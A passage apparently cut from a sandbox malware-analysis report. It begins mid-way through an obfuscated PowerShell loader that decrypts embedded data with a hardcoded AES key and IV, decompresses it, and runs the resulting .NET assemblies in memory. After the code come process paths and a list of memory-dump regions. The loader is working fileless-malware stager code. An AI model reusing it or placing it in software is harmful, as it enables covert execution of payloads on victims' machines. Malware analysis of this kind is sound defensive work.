vJfVF($ktYNE){$OYIYV=[System.Security.Cryptography.Aes]::Create();$OYIYV.Mode=[System.Security.Cryptography.CipherMode]::CBC;$OYIYV.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$OYIYV.Key=[System.Convert]::($GZdQ[12])('HessG9Sp8I98uzvuAQwIGoeAOpm2R4JZwqif+tn9mzM=');$OYIYV.IV=[System.Convert]::($GZdQ[12])('Sq8oY624DUi5D/0NV4f3lQ==');$NPmYK=$OYIYV.($GZdQ[3])();$clLIZ=$NPmYK.($GZdQ[10])($ktYNE,0,$ktYNE.Length);$NPmYK.Dispose();$OYIYV.Dispose();$clLIZ;}function JqmHs($ktYNE){$fhwpD=New-Object System.IO.MemoryStream(,$ktYNE);$yEEHb=New-Object System.IO.MemoryStream;$CPPWk=New-Object System.IO.Compression.GZipStream($fhwpD,[IO.Compression.CompressionMode]::($GZdQ[8]));$CPPWk.($GZdQ[9])($yEEHb);$CPPWk.Dispose();$fhwpD.Dispose();$yEEHb.Dispose();$yEEHb.ToArray();}$rlqXf=[System.IO.File]::($GZdQ[2])([Console]::Title);$bUDiU=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 5).Substring(2))));$hdfCS=JqmHs (vJfVF ([Convert]::($GZdQ[12])([System.Linq.Enumerable]::($GZdQ[13])($rlqXf, 
6).Substring(2))));[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$hdfCS).($GZdQ[5]).($GZdQ[0])($null,$null);[System.Reflection.Assembly]::($GZdQ[7])([byte[]]$bUDiU).($GZdQ[5]).($GZdQ[0])($null,$null); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/2868-4-0x000000001B160000-0x000000001B442000-memory.dmp
memory/2868-5-0x0000000002420000-0x0000000002428000-memory.dmp
memory/2868-6-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp
memory/2868-7-0x00000000025F0000-0x0000000002670000-memory.dmp
memory/2868-8-0x00000000025F0000-0x0000000002670000-memory.dmp
memory/2868-9-0x00000000025F0000-0x0000000002670000-memory.dmp
memory/2868-11-0x00000000025F0000-0x0000000002670000-memory.dmp
memory/2868-10-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp
memory/2868-12-0x000007FEF5230000-0x000007FEF5BCD000-memory.dmp
memory/2868-13-0x00000000025F0000-0x0000000002670000-memory.dmp
memory/2868-14-0x00000000025F0000-0x0000000002670000-memory.dmp